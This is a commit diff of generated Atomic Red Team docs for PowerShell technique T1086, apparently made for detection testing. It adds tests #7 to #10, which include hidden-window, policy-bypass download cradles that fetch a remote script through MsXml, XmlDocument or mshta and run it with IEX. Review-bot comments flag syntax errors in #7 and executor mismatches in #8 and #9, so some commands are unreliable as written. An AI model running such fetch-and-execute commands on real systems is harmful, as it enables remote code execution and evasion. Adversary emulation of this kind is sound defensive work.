Generate docs from job=validate_atomics_generate_docs branch=T1086-mhaag

CircleCI Atomic Red Team doc generator
2018-07-09 16:52:30 +00:00
parent f5a5aa8d6a
commit e9852d00b4
3 changed files with 89 additions and 0 deletions
+81
@@ -34,6 +34,14 @@ Remote Support: Yes</blockquote>
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #7 - Powershell MsXml COM object](#atomic-test-7---powershell-msxml-com-object)
- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
<br/>
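Review bot: The new table-of-contents entries for tests #7 to #10 spell the product name "Powershell", while the existing entry for #6 uses "PowerShell". The anchors are derived from the titles, so settle on one spelling in the test names before the docs are regenerated; that keeps the links in this list and the matching index entries consistent.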
@@ -142,3 +150,76 @@ Using PS 5.1, add a user via CLI
New-LocalUser -FullName '${full_name}' -Name '${user_name}' -Password ${password} Description '${description}'
```
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `powershell`!
```
powershell.exe -exec bypass -windowstyle hidden -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(GET,${url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText”
```
<br/>
<br/>
## Atomic Test #8 - Powershell XML requests
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `powershell`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('${url}');$Xml.command.a.execute | IEX"
```
<br/>
<br/>
## Atomic Test #9 - Powershell invoke mshta.exe download
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Run it with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:${url}").Exec();close()"
```
<br/>
<br/>
## Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
<br/>
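Review bot: The Atomic Test #7 command is not valid PowerShell as written: in `$comMsXml.Open(GET,${url}',$False)` the method name `GET` is unquoted and `${url}'` has a closing quote with no opening one, and the whole script argument is wrapped in typographic quotes (“ ”) instead of straight double quotes. Suggest `Open('GET','${url}',$False)` inside straight quotes, corrected in the test definition these docs are generated from rather than in the generated Markdown. Tests #8 and #9 are headed "Run it with `powershell`!" but their command lines begin with a quoted executable path, which PowerShell treats as a string expression unless it is prefixed with `&`; #9 also starts `cmd.exe` and nests double quotes inside the outer `/c "..."` string, so the executor label or the command should change to match. Test #10 names `Invoke-DownloadCradle.ps1` without an input or path saying where the script comes from, and the #7 description line ("Not proxy aware removing cache although...") needs rewording to be readable.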
+4
@@ -454,6 +454,10 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
+4
@@ -374,6 +374,10 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]